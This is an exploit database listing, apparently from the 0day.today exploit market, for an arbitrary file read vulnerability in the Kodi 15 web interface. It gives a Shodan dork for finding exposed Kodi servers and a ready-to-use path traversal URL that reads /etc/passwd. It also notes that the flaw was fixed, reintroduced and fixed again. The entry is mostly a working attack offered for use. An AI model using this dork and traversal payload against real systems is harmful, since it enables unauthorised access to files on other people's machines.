[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Kodi 15 - Arbitrary File Aaccess (Web Interface) Vulnerability

Author
Machiel Pronk
Risk
[
Security Risk High
]
0day-ID
0day-ID-24635
Category
web applications
Date add
01-12-2015
Platform
linux
# Exploit Title: arbitrary file access kodi web interface
# Shodan dork: title:kodi
# Date: 25-11-2015
# Contact: https://twitter.com/mpronk89
# Software Link: http://kodi.tv/
# Original report:
http://forum.kodi.tv/showthread.php?tid=144110&pid=2170305#pid2170305
# Version: v15
# Tested on: linux
# CVE : n/a
 
kodi web interface vulnerable to arbitrary file read.
 
example:
<ip>:<port:/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
 
 
for passwd
 
​(issue fixed in 2012, reintroduced in february 2015. Fixed again november
2015 for v16)

#  0day.today [2024-12-25]  #